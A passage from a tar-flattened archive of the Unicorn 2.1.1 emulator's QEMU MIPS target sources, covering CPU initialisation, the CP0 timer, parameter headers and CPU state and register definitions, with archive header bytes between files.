MIPS_CPU(other_cs); /* Turn off all VPs except the one executing the dvp. */ if (&other_cpu->env != env) { mips_vpe_sleep(other_cpu); } } env->CP0_VPControl |= (1 << CP0VPCtl_DIS); } return prev; #endif return 0; } target_ulong helper_evp(CPUMIPSState *env) { #if 0 CPUState *other_cs = first_cpu; target_ulong prev = env->CP0_VPControl; if ((env->CP0_VPControl >> CP0VPCtl_DIS) & 1) { CPU_FOREACH(other_cs) { MIPSCPU *other_cpu = MIPS_CPU(other_cs); if ((&other_cpu->env != env) && !mips_vp_is_wfi(other_cpu)) { /* * If the VP is WFI, don't disturb its sleep. * Otherwise, wake it up. */ mips_vpe_wake(other_cpu); } } env->CP0_VPControl &= ~(1 << CP0VPCtl_DIS); } return prev; #endif return 0; } ����������������������������������unicorn-2.1.1/qemu/target/mips/cp0_timer.c����������������������������������������������������������0000664�0000000�0000000�00000012001�14675241067�0020431�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU MIPS timer support * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" //#include "hw/irq.h" //#include "hw/mips/cpudevs.h" #include "qemu/timer.h" //#include "sysemu/kvm.h" #include "internal.h" #define TIMER_PERIOD 10 /* 10 ns period for 100 Mhz frequency */ /* XXX: do not use a global */ uint32_t cpu_mips_get_random(CPUMIPSState *env) { static uint32_t seed = 1; static uint32_t prev_idx = 0; uint32_t idx; uint32_t nb_rand_tlb = env->tlb->nb_tlb - env->CP0_Wired; if (nb_rand_tlb == 1) { return env->tlb->nb_tlb - 1; } /* Don't return same value twice, so get another value */ do { /* * Use a simple algorithm of Linear Congruential Generator * from ISO/IEC 9899 standard. */ seed = 1103515245 * seed + 12345; idx = (seed >> 16) % nb_rand_tlb + env->CP0_Wired; } while (idx == prev_idx); prev_idx = idx; return idx; } #if 0 /* MIPS R4K timer */ static void cpu_mips_timer_update(CPUMIPSState *env) { uint64_t now, next; uint32_t wait; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); wait = env->CP0_Compare - env->CP0_Count - (uint32_t)(now / TIMER_PERIOD); next = now + (uint64_t)wait * TIMER_PERIOD; timer_mod(env->timer, next); } /* Expire the timer. */ static void cpu_mips_timer_expire(CPUMIPSState *env) { cpu_mips_timer_update(env); if (env->insn_flags & ISA_MIPS32R2) { env->CP0_Cause |= 1 << CP0Ca_TI; } qemu_irq_raise(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); } uint32_t cpu_mips_get_count(CPUMIPSState *env) { if (env->CP0_Cause & (1 << CP0Ca_DC)) { return env->CP0_Count; } else { uint64_t now; now = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL); if (timer_pending(env->timer) && timer_expired(env->timer, now)) { /* The timer has already expired. */ cpu_mips_timer_expire(env); } return env->CP0_Count + (uint32_t)(now / TIMER_PERIOD); } } void cpu_mips_store_count(CPUMIPSState *env, uint32_t count) { /* * This gets called from cpu_state_reset(), potentially before timer init. * So env->timer may be NULL, which is also the case with KVM enabled so * treat timer as disabled in that case. */ if (env->CP0_Cause & (1 << CP0Ca_DC) || !env->timer) { env->CP0_Count = count; } else { /* Store new count register */ env->CP0_Count = count - (uint32_t)(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / TIMER_PERIOD); /* Update timer timer */ cpu_mips_timer_update(env); } } void cpu_mips_store_compare(CPUMIPSState *env, uint32_t value) { env->CP0_Compare = value; if (!(env->CP0_Cause & (1 << CP0Ca_DC))) { cpu_mips_timer_update(env); } if (env->insn_flags & ISA_MIPS32R2) { env->CP0_Cause &= ~(1 << CP0Ca_TI); } qemu_irq_lower(env->irq[(env->CP0_IntCtl >> CP0IntCtl_IPTI) & 0x7]); } void cpu_mips_start_count(CPUMIPSState *env) { cpu_mips_store_count(env, env->CP0_Count); } void cpu_mips_stop_count(CPUMIPSState *env) { /* Store the current value */ env->CP0_Count += (uint32_t)(qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) / TIMER_PERIOD); } static void mips_timer_cb(void *opaque) { CPUMIPSState *env; env = opaque; if (env->CP0_Cause & (1 << CP0Ca_DC)) { return; } /* * ??? This callback should occur when the counter is exactly equal to * the comparator value. Offset the count by one to avoid immediately * retriggering the callback before any virtual time has passed. */ env->CP0_Count++; cpu_mips_timer_expire(env); env->CP0_Count--; } void cpu_mips_clock_init(MIPSCPU *cpu) { CPUMIPSState *env = &cpu->env; /* * If we're in KVM mode, don't create the periodic timer, that is handled in * kernel. */ if (!kvm_enabled()) { env->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, &mips_timer_cb, env); } } #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/cpu-param.h����������������������������������������������������������0000664�0000000�0000000�00000000734�14675241067�0020453�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS cpu parameters for qemu. * * SPDX-License-Identifier: LGPL-2.0+ */ #ifndef MIPS_CPU_PARAM_H #define MIPS_CPU_PARAM_H 1 #ifdef TARGET_MIPS64 # define TARGET_LONG_BITS 64 #else # define TARGET_LONG_BITS 32 #endif #ifdef TARGET_MIPS64 #define TARGET_PHYS_ADDR_SPACE_BITS 48 #define TARGET_VIRT_ADDR_SPACE_BITS 48 #else #define TARGET_PHYS_ADDR_SPACE_BITS 40 #define TARGET_VIRT_ADDR_SPACE_BITS 32 #endif #define TARGET_PAGE_BITS 12 #define NB_MMU_MODES 4 #endif ������������������������������������unicorn-2.1.1/qemu/target/mips/cpu-qom.h������������������������������������������������������������0000664�0000000�0000000�00000002646�14675241067�0020153�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU MIPS CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #ifndef QEMU_MIPS_CPU_QOM_H #define QEMU_MIPS_CPU_QOM_H #include "hw/core/cpu.h" #ifdef TARGET_MIPS64 #define TYPE_MIPS_CPU "mips64-cpu" #else #define TYPE_MIPS_CPU "mips-cpu" #endif #define MIPS_CPU(obj) ((MIPSCPU *)obj) #define MIPS_CPU_CLASS(klass) ((MIPSCPUClass *)klass) #define MIPS_CPU_GET_CLASS(obj) (&((MIPSCPU *)obj)->cc) /** * MIPSCPUClass: * @parent_realize: The parent class' realize handler. * @parent_reset: The parent class' reset handler. * * A MIPS CPU model. */ typedef struct MIPSCPUClass { /*< private >*/ CPUClass parent_class; /*< public >*/ void (*parent_reset)(CPUState *cpu); } MIPSCPUClass; typedef struct MIPSCPU MIPSCPU; #endif ������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/cpu.c����������������������������������������������������������������0000664�0000000�0000000�00000012460�14675241067�0017347�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU MIPS CPU * * Copyright (c) 2012 SUSE LINUX Products GmbH * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see * <http://www.gnu.org/licenses/lgpl-2.1.html> */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/exec-all.h" #include <uc_priv.h> static void mips_cpu_set_pc(CPUState *cs, vaddr value) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; env->active_tc.PC = value & ~(target_ulong)1; if (value & 1) { env->hflags |= MIPS_HFLAG_M16; } else { env->hflags &= ~(MIPS_HFLAG_M16); } } static void mips_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; env->active_tc.PC = tb->pc; env->hflags &= ~MIPS_HFLAG_BMASK; env->hflags |= tb->flags & MIPS_HFLAG_BMASK; } static bool mips_cpu_has_work(CPUState *cs) { MIPSCPU *cpu = MIPS_CPU(cs); CPUMIPSState *env = &cpu->env; bool has_work = false; /* * Prior to MIPS Release 6 it is implementation dependent if non-enabled * interrupts wake-up the CPU, however most of the implementations only * check for interrupts that can be taken. */ if ((cs->interrupt_request & CPU_INTERRUPT_HARD) && cpu_mips_hw_interrupts_pending(env)) { if (cpu_mips_hw_interrupts_enabled(env) || (env->insn_flags & ISA_MIPS32R6)) { has_work = true; } } /* MIPS-MT has the ability to halt the CPU. */ if (env->CP0_Config3 & (1 << CP0C3_MT)) { /* * The QEMU model will issue an _WAKE request whenever the CPUs * should be woken up. */ if (cs->interrupt_request & CPU_INTERRUPT_WAKE) { has_work = true; } if (!mips_vpe_active(env)) { has_work = false; } } /* MIPS Release 6 has the ability to halt the CPU. */ if (env->CP0_Config5 & (1 << CP0C5_VP)) { if (cs->interrupt_request & CPU_INTERRUPT_WAKE) { has_work = true; } if (!mips_vp_active(env, cs)) { has_work = false; } } return has_work; } static void mips_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); MIPSCPU *cpu = MIPS_CPU(s); MIPSCPUClass *mcc = MIPS_CPU_GET_CLASS(cpu); CPUMIPSState *env = &cpu->env; mcc->parent_reset(dev); memset(env, 0, offsetof(CPUMIPSState, end_reset_fields)); cpu_state_reset(env); } static void mips_cpu_realizefn(CPUState *dev) { CPUState *cs = CPU(dev); MIPSCPU *cpu = MIPS_CPU(dev); cpu_exec_realizefn(cs); cpu_mips_realize_env(&cpu->env); cpu_reset(cs); } static void mips_cpu_initfn(struct uc_struct *uc, CPUState *obj) { MIPSCPU *cpu = MIPS_CPU(obj); CPUMIPSState *env = &cpu->env; env->uc = uc; cpu_set_cpustate_pointers(cpu); } static void mips_cpu_class_init(CPUClass *c) { MIPSCPUClass *mcc = MIPS_CPU_CLASS(c); CPUClass *cc = CPU_CLASS(c); /* parent class is CPUClass, parent_reset() is cpu_common_reset(). */ mcc->parent_reset = cc->reset; /* overwrite the CPUClass->reset to arch reset: x86_cpu_reset(). */ cc->reset = mips_cpu_reset; cc->has_work = mips_cpu_has_work; cc->do_interrupt = mips_cpu_do_interrupt; cc->cpu_exec_interrupt = mips_cpu_exec_interrupt; cc->set_pc = mips_cpu_set_pc; cc->synchronize_from_tb = mips_cpu_synchronize_from_tb; cc->do_unaligned_access = mips_cpu_do_unaligned_access; cc->get_phys_page_debug = mips_cpu_get_phys_page_debug; cc->tcg_initialize = mips_tcg_init; cc->tlb_fill_cpu = mips_cpu_tlb_fill; } MIPSCPU *cpu_mips_init(struct uc_struct *uc) { MIPSCPU *cpu; CPUState *cs; CPUClass *cc; CPUMIPSState *env; cpu = calloc(1, sizeof(*cpu)); if (cpu == NULL) { return NULL; } #ifdef TARGET_MIPS64 if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_MIPS64_R4000; // R4000 } else if (uc->cpu_model + UC_CPU_MIPS32_I7200 + 1 >= mips_defs_number ) { free(cpu); return NULL; } #else if (uc->cpu_model == INT_MAX) { uc->cpu_model = UC_CPU_MIPS32_74KF; // 74kf } else if (uc->cpu_model >= mips_defs_number) { free(cpu); return NULL; } #endif cs = (CPUState *)cpu; cc = (CPUClass *)&cpu->cc; cs->cc = cc; cs->uc = uc; uc->cpu = cs; cpu_class_init(uc, cc); mips_cpu_class_init(cc); cpu_common_initfn(uc, cs); mips_cpu_initfn(uc, cs); env = &cpu->env; env->cpu_model = &(mips_defs[uc->cpu_model]); if (env->cpu_model == NULL) { free(cpu); return NULL; } mips_cpu_realizefn(cs); // init address space cpu_address_space_init(cs, 0, cs->memory); qemu_init_vcpu(cs); return cpu; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/cpu.h����������������������������������������������������������������0000664�0000000�0000000�00000113705�14675241067�0017360�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MIPS_CPU_H #define MIPS_CPU_H #include "cpu-qom.h" #include "exec/cpu-defs.h" #include "fpu/softfloat-types.h" #include "mips-defs.h" #define TCG_GUEST_DEFAULT_MO (0) typedef struct CPUMIPSTLBContext CPUMIPSTLBContext; /* MSA Context */ #define MSA_WRLEN (128) typedef union wr_t wr_t; union wr_t { int8_t b[MSA_WRLEN / 8]; int16_t h[MSA_WRLEN / 16]; int32_t w[MSA_WRLEN / 32]; int64_t d[MSA_WRLEN / 64]; }; typedef union fpr_t fpr_t; union fpr_t { float64 fd; /* ieee double precision */ float32 fs[2];/* ieee single precision */ uint64_t d; /* binary double fixed-point */ uint32_t w[2]; /* binary single fixed-point */ /* FPU/MSA register mapping is not tested on big-endian hosts. */ wr_t wr; /* vector data */ }; /* *define FP_ENDIAN_IDX to access the same location * in the fpr_t union regardless of the host endianness */ #if defined(HOST_WORDS_BIGENDIAN) # define FP_ENDIAN_IDX 1 #else # define FP_ENDIAN_IDX 0 #endif typedef struct CPUMIPSFPUContext CPUMIPSFPUContext; struct CPUMIPSFPUContext { /* Floating point registers */ fpr_t fpr[32]; float_status fp_status; /* fpu implementation/revision register (fir) */ uint32_t fcr0; #define FCR0_FREP 29 #define FCR0_UFRP 28 #define FCR0_HAS2008 23 #define FCR0_F64 22 #define FCR0_L 21 #define FCR0_W 20 #define FCR0_3D 19 #define FCR0_PS 18 #define FCR0_D 17 #define FCR0_S 16 #define FCR0_PRID 8 #define FCR0_REV 0 /* fcsr */ uint32_t fcr31_rw_bitmask; uint32_t fcr31; #define FCR31_FS 24 #define FCR31_ABS2008 19 #define FCR31_NAN2008 18 #define SET_FP_COND(num, env) do { ((env).fcr31) |= \ ((num) ? (1 << ((num) + 24)) : \ (1 << 23)); \ } while (0) #define CLEAR_FP_COND(num, env) do { ((env).fcr31) &= \ ~((num) ? (1 << ((num) + 24)) : \ (1 << 23)); \ } while (0) #define GET_FP_COND(env) ((((env).fcr31 >> 24) & 0xfe) | \ (((env).fcr31 >> 23) & 0x1)) #define GET_FP_CAUSE(reg) (((reg) >> 12) & 0x3f) #define GET_FP_ENABLE(reg) (((reg) >> 7) & 0x1f) #define GET_FP_FLAGS(reg) (((reg) >> 2) & 0x1f) #define SET_FP_CAUSE(reg, v) do { (reg) = ((reg) & ~(0x3f << 12)) | \ ((v & 0x3f) << 12); \ } while (0) #define SET_FP_ENABLE(reg, v) do { (reg) = ((reg) & ~(0x1f << 7)) | \ ((v & 0x1f) << 7); \ } while (0) #define SET_FP_FLAGS(reg, v) do { (reg) = ((reg) & ~(0x1f << 2)) | \ ((v & 0x1f) << 2); \ } while (0) #define UPDATE_FP_FLAGS(reg, v) do { (reg) |= ((v & 0x1f) << 2); } while (0) #define FP_INEXACT 1 #define FP_UNDERFLOW 2 #define FP_OVERFLOW 4 #define FP_DIV0 8 #define FP_INVALID 16 #define FP_UNIMPLEMENTED 32 }; #define TARGET_INSN_START_EXTRA_WORDS 2 typedef struct CPUMIPSMVPContext CPUMIPSMVPContext; struct CPUMIPSMVPContext { int32_t CP0_MVPControl; #define CP0MVPCo_CPA 3 #define CP0MVPCo_STLB 2 #define CP0MVPCo_VPC 1 #define CP0MVPCo_EVP 0 int32_t CP0_MVPConf0; #define CP0MVPC0_M 31 #define CP0MVPC0_TLBS 29 #define CP0MVPC0_GS 28 #define CP0MVPC0_PCP 27 #define CP0MVPC0_PTLBE 16 #define CP0MVPC0_TCA 15 #define CP0MVPC0_PVPE 10 #define CP0MVPC0_PTC 0 int32_t CP0_MVPConf1; #define CP0MVPC1_CIM 31 #define CP0MVPC1_CIF 30 #define CP0MVPC1_PCX 20 #define CP0MVPC1_PCP2 10 #define CP0MVPC1_PCP1 0 }; typedef struct mips_def_t mips_def_t; #define MIPS_SHADOW_SET_MAX 16 #define MIPS_TC_MAX 5 #define MIPS_FPU_MAX 1 #define MIPS_DSP_ACC 4 #define MIPS_KSCRATCH_NUM 6 #define MIPS_MAAR_MAX 16 /* Must be an even number. */ /* * Summary of CP0 registers * ======================== * * * Register 0 Register 1 Register 2 Register 3 * ---------- ---------- ---------- ---------- * * 0 Index Random EntryLo0 EntryLo1 * 1 MVPControl VPEControl TCStatus GlobalNumber * 2 MVPConf0 VPEConf0 TCBind * 3 MVPConf1 VPEConf1 TCRestart * 4 VPControl YQMask TCHalt * 5 VPESchedule TCContext * 6 VPEScheFBack TCSchedule * 7 VPEOpt TCScheFBack TCOpt * * * Register 4 Register 5 Register 6 Register 7 * ---------- ---------- ---------- ---------- * * 0 Context PageMask Wired HWREna * 1 ContextConfig PageGrain SRSConf0 * 2 UserLocal SegCtl0 SRSConf1 * 3 XContextConfig SegCtl1 SRSConf2 * 4 DebugContextID SegCtl2 SRSConf3 * 5 MemoryMapID PWBase SRSConf4 * 6 PWField PWCtl * 7 PWSize * * * Register 8 Register 9 Register 10 Register 11 * ---------- ---------- ----------- ----------- * * 0 BadVAddr Count EntryHi Compare * 1 BadInstr * 2 BadInstrP * 3 BadInstrX * 4 GuestCtl1 GuestCtl0Ext * 5 GuestCtl2 * 6 SAARI GuestCtl3 * 7 SAAR * * * Register 12 Register 13 Register 14 Register 15 * ----------- ----------- ----------- ----------- * * 0 Status Cause EPC PRId * 1 IntCtl EBase * 2 SRSCtl NestedEPC CDMMBase * 3 SRSMap CMGCRBase * 4 View_IPL View_RIPL BEVVA * 5 SRSMap2 NestedExc * 6 GuestCtl0 * 7 GTOffset * * * Register 16 Register 17 Register 18 Register 19 * ----------- ----------- ----------- ----------- * * 0 Config LLAddr WatchLo0 WatchHi * 1 Config1 MAAR WatchLo1 WatchHi * 2 Config2 MAARI WatchLo2 WatchHi * 3 Config3 WatchLo3 WatchHi * 4 Config4 WatchLo4 WatchHi * 5 Config5 WatchLo5 WatchHi * 6 WatchLo6 WatchHi * 7 WatchLo7 WatchHi * * * Register 20 Register 21 Register 22 Register 23 * ----------- ----------- ----------- ----------- * * 0 XContext Debug * 1 TraceControl * 2 TraceControl2 * 3 UserTraceData1 * 4 TraceIBPC * 5 TraceDBPC * 6 Debug2 * 7 * * * Register 24 Register 25 Register 26 Register 27 * ----------- ----------- ----------- ----------- * * 0 DEPC PerfCnt ErrCtl CacheErr * 1 PerfCnt * 2 TraceControl3 PerfCnt * 3 UserTraceData2 PerfCnt * 4 PerfCnt * 5 PerfCnt * 6 PerfCnt * 7 PerfCnt * * * Register 28 Register 29 Register 30 Register 31 * ----------- ----------- ----------- ----------- * * 0 DataLo DataHi ErrorEPC DESAVE * 1 TagLo TagHi * 2 DataLo1 DataHi1 KScratch<n> * 3 TagLo1 TagHi1 KScratch<n> * 4 DataLo2 DataHi2 KScratch<n> * 5 TagLo2 TagHi2 KScratch<n> * 6 DataLo3 DataHi3 KScratch<n> * 7 TagLo3 TagHi3 KScratch<n> * */ #define CP0_REGISTER_00 0 #define CP0_REGISTER_01 1 #define CP0_REGISTER_02 2 #define CP0_REGISTER_03 3 #define CP0_REGISTER_04 4 #define CP0_REGISTER_05 5 #define CP0_REGISTER_06 6 #define CP0_REGISTER_07 7 #define CP0_REGISTER_08 8 #define CP0_REGISTER_09 9 #define CP0_REGISTER_10 10 #define CP0_REGISTER_11 11 #define CP0_REGISTER_12 12 #define CP0_REGISTER_13 13 #define CP0_REGISTER_14 14 #define CP0_REGISTER_15 15 #define CP0_REGISTER_16 16 #define CP0_REGISTER_17 17 #define CP0_REGISTER_18 18 #define CP0_REGISTER_19 19 #define CP0_REGISTER_20 20 #define CP0_REGISTER_21 21 #define CP0_REGISTER_22 22 #define CP0_REGISTER_23 23 #define CP0_REGISTER_24 24 #define CP0_REGISTER_25 25 #define CP0_REGISTER_26 26 #define CP0_REGISTER_27 27 #define CP0_REGISTER_28 28 #define CP0_REGISTER_29 29 #define CP0_REGISTER_30 30 #define CP0_REGISTER_31 31 /* CP0 Register 00 */ #define CP0_REG00__INDEX 0 #define CP0_REG00__MVPCONTROL 1 #define CP0_REG00__MVPCONF0 2 #define CP0_REG00__MVPCONF1 3 #define CP0_REG00__VPCONTROL 4 /* CP0 Register 01 */ #define CP0_REG01__RANDOM 0 #define CP0_REG01__VPECONTROL 1 #define CP0_REG01__VPECONF0 2 #define CP0_REG01__VPECONF1 3 #define CP0_REG01__YQMASK 4 #define CP0_REG01__VPESCHEDULE 5 #define CP0_REG01__VPESCHEFBACK 6 #define CP0_REG01__VPEOPT 7 /* CP0 Register 02 */ #define CP0_REG02__ENTRYLO0 0 #define CP0_REG02__TCSTATUS 1 #define CP0_REG02__TCBIND 2 #define CP0_REG02__TCRESTART 3 #define CP0_REG02__TCHALT 4 #define CP0_REG02__TCCONTEXT 5 #define CP0_REG02__TCSCHEDULE 6 #define CP0_REG02__TCSCHEFBACK 7 /* CP0 Register 03 */ #define CP0_REG03__ENTRYLO1 0 #define CP0_REG03__GLOBALNUM 1 #define CP0_REG03__TCOPT 7 /* CP0 Register 04 */ #define CP0_REG04__CONTEXT 0 #define CP0_REG04__CONTEXTCONFIG 1 #define CP0_REG04__USERLOCAL 2 #define CP0_REG04__XCONTEXTCONFIG 3 #define CP0_REG04__DBGCONTEXTID 4 #define CP0_REG04__MMID 5 /* CP0 Register 05 */ #define CP0_REG05__PAGEMASK 0 #define CP0_REG05__PAGEGRAIN 1 #define CP0_REG05__SEGCTL0 2 #define CP0_REG05__SEGCTL1 3 #define CP0_REG05__SEGCTL2 4 #define CP0_REG05__PWBASE 5 #define CP0_REG05__PWFIELD 6 #define CP0_REG05__PWSIZE 7 /* CP0 Register 06 */ #define CP0_REG06__WIRED 0 #define CP0_REG06__SRSCONF0 1 #define CP0_REG06__SRSCONF1 2 #define CP0_REG06__SRSCONF2 3 #define CP0_REG06__SRSCONF3 4 #define CP0_REG06__SRSCONF4 5 #define CP0_REG06__PWCTL 6 /* CP0 Register 07 */ #define CP0_REG07__HWRENA 0 /* CP0 Register 08 */ #define CP0_REG08__BADVADDR 0 #define CP0_REG08__BADINSTR 1 #define CP0_REG08__BADINSTRP 2 #define CP0_REG08__BADINSTRX 3 /* CP0 Register 09 */ #define CP0_REG09__COUNT 0 #define CP0_REG09__SAARI 6 #define CP0_REG09__SAAR 7 /* CP0 Register 10 */ #define CP0_REG10__ENTRYHI 0 #define CP0_REG10__GUESTCTL1 4 #define CP0_REG10__GUESTCTL2 5 #define CP0_REG10__GUESTCTL3 6 /* CP0 Register 11 */ #define CP0_REG11__COMPARE 0 #define CP0_REG11__GUESTCTL0EXT 4 /* CP0 Register 12 */ #define CP0_REG12__STATUS 0 #define CP0_REG12__INTCTL 1 #define CP0_REG12__SRSCTL 2 #define CP0_REG12__SRSMAP 3 #define CP0_REG12__VIEW_IPL 4 #define CP0_REG12__SRSMAP2 5 #define CP0_REG12__GUESTCTL0 6 #define CP0_REG12__GTOFFSET 7 /* CP0 Register 13 */ #define CP0_REG13__CAUSE 0 #define CP0_REG13__VIEW_RIPL 4 #define CP0_REG13__NESTEDEXC 5 /* CP0 Register 14 */ #define CP0_REG14__EPC 0 #define CP0_REG14__NESTEDEPC 2 /* CP0 Register 15 */ #define CP0_REG15__PRID 0 #define CP0_REG15__EBASE 1 #define CP0_REG15__CDMMBASE 2 #define CP0_REG15__CMGCRBASE 3 #define CP0_REG15__BEVVA 4 /* CP0 Register 16 */ #define CP0_REG16__CONFIG 0 #define CP0_REG16__CONFIG1 1 #define CP0_REG16__CONFIG2 2 #define CP0_REG16__CONFIG3 3 #define CP0_REG16__CONFIG4 4 #define CP0_REG16__CONFIG5 5 #define CP0_REG16__CONFIG6 6 #define CP0_REG16__CONFIG7 7 /* CP0 Register 17 */ #define CP0_REG17__LLADDR 0 #define CP0_REG17__MAAR 1 #define CP0_REG17__MAARI 2 /* CP0 Register 18 */ #define CP0_REG18__WATCHLO0 0 #define CP0_REG18__WATCHLO1 1 #define CP0_REG18__WATCHLO2 2 #define CP0_REG18__WATCHLO3 3 #define CP0_REG18__WATCHLO4 4 #define CP0_REG18__WATCHLO5 5 #define CP0_REG18__WATCHLO6 6 #define CP0_REG18__WATCHLO7 7 /* CP0 Register 19 */ #define CP0_REG19__WATCHHI0 0 #define CP0_REG19__WATCHHI1 1 #define CP0_REG19__WATCHHI2 2 #define CP0_REG19__WATCHHI3 3 #define CP0_REG19__WATCHHI4 4 #define CP0_REG19__WATCHHI5 5 #define CP0_REG19__WATCHHI6 6 #define CP0_REG19__WATCHHI7 7 /* CP0 Register 20 */ #define CP0_REG20__XCONTEXT 0 /* CP0 Register 21 */ /* CP0 Register 22 */ /* CP0 Register 23 */ #define CP0_REG23__DEBUG 0 #define CP0_REG23__TRACECONTROL 1 #define CP0_REG23__TRACECONTROL2 2 #define CP0_REG23__USERTRACEDATA1 3 #define CP0_REG23__TRACEIBPC 4 #define CP0_REG23__TRACEDBPC 5 #define CP0_REG23__DEBUG2 6 /* CP0 Register 24 */ #define CP0_REG24__DEPC 0 /* CP0 Register 25 */ #define CP0_REG25__PERFCTL0 0 #define CP0_REG25__PERFCNT0 1 #define CP0_REG25__PERFCTL1 2 #define CP0_REG25__PERFCNT1 3 #define CP0_REG25__PERFCTL2 4 #define CP0_REG25__PERFCNT2 5 #define CP0_REG25__PERFCTL3 6 #define CP0_REG25__PERFCNT3 7 /* CP0 Register 26 */ #define CP0_REG26__ERRCTL 0 /* CP0 Register 27 */ #define CP0_REG27__CACHERR 0 /* CP0 Register 28 */ #define CP0_REG28__TAGLO 0 #define CP0_REG28__DATALO 1 #define CP0_REG28__TAGLO1 2 #define CP0_REG28__DATALO1 3 #define CP0_REG28__TAGLO2 4 #define CP0_REG28__DATALO2 5 #define CP0_REG28__TAGLO3 6 #define CP0_REG28__DATALO3 7 /* CP0 Register 29 */ #define CP0_REG29__TAGHI 0 #define CP0_REG29__DATAHI 1 #define CP0_REG29__TAGHI1 2 #define CP0_REG29__DATAHI1 3 #define CP0_REG29__TAGHI2 4 #define CP0_REG29__DATAHI2 5 #define CP0_REG29__TAGHI3 6 #define CP0_REG29__DATAHI3 7 /* CP0 Register 30 */ #define CP0_REG30__ERROREPC 0 /* CP0 Register 31 */ #define CP0_REG31__DESAVE 0 #define CP0_REG31__KSCRATCH1 2 #define CP0_REG31__KSCRATCH2 3 #define CP0_REG31__KSCRATCH3 4 #define CP0_REG31__KSCRATCH4 5 #define CP0_REG31__KSCRATCH5 6 #define CP0_REG31__KSCRATCH6 7 typedef struct TCState TCState; struct TCState { target_ulong gpr[32]; target_ulong PC; target_ulong HI[MIPS_DSP_ACC]; target_ulong LO[MIPS_DSP_ACC]; target_ulong ACX[MIPS_DSP_ACC]; target_ulong DSPControl; int32_t CP0_TCStatus; #define CP0TCSt_TCU3 31 #define CP0TCSt_TCU2 30 #define CP0TCSt_TCU1 29 #define CP0TCSt_TCU0 28 #define CP0TCSt_TMX 27 #define CP0TCSt_RNST 23 #define CP0TCSt_TDS 21 #define CP0TCSt_DT 20 #define CP0TCSt_DA 15 #define CP0TCSt_A 13 #define CP0TCSt_TKSU 11 #define CP0TCSt_IXMT 10 #define CP0TCSt_TASID 0 int32_t CP0_TCBind; #define CP0TCBd_CurTC 21 #define CP0TCBd_TBE 17 #define CP0TCBd_CurVPE 0 target_ulong CP0_TCHalt; target_ulong CP0_TCContext; target_ulong CP0_TCSchedule; target_ulong CP0_TCScheFBack; int32_t CP0_Debug_tcstatus; target_ulong CP0_UserLocal; int32_t msacsr; #define MSACSR_FS 24 #define MSACSR_FS_MASK (1 << MSACSR_FS) #define MSACSR_NX 18 #define MSACSR_NX_MASK (1 << MSACSR_NX) #define MSACSR_CEF 2 #define MSACSR_CEF_MASK (0xffff << MSACSR_CEF) #define MSACSR_RM 0 #define MSACSR_RM_MASK (0x3 << MSACSR_RM) #define MSACSR_MASK (MSACSR_RM_MASK | MSACSR_CEF_MASK | MSACSR_NX_MASK | \ MSACSR_FS_MASK) float_status msa_fp_status; /* Upper 64-bit MMRs (multimedia registers); the lower 